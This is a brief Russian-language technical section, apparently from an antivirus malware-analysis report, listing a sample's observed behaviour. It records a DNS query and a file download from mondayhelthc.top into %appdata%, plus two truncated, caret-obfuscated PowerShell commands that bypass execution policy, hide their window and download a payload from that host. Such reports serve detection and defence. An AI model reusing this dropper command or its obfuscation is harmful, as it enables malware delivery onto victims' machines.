Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^er^S^HeLl.EXE^ -Ex^EcUT^IonPO^L^ICY bYP^Ass ^-^NOPR^OFIL^E^ ^-Wi^ND^owst^YLe Hi^dden^ (NEw^-oB^jeC^t SYSTem.Net.wEbCl^IeNT^)^.DoWNl^OaDf^ile('http://mondayhelthc.top/read.php?f...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^er^S^HeLl.EXE^ -Ex^EcUT^IonPO^L^ICY bYP^Ass ^-^NOPR^OFIL^E^ ^-Wi^ND^owst^YLe Hi^dden^ (NEw^-oB^jeC^t SYSTem.Net.wEbCl^IeNT^)^.DoWNl^OaDf^ile('http://mondayhelthc.top/read.php?f...' (со скрытым окном)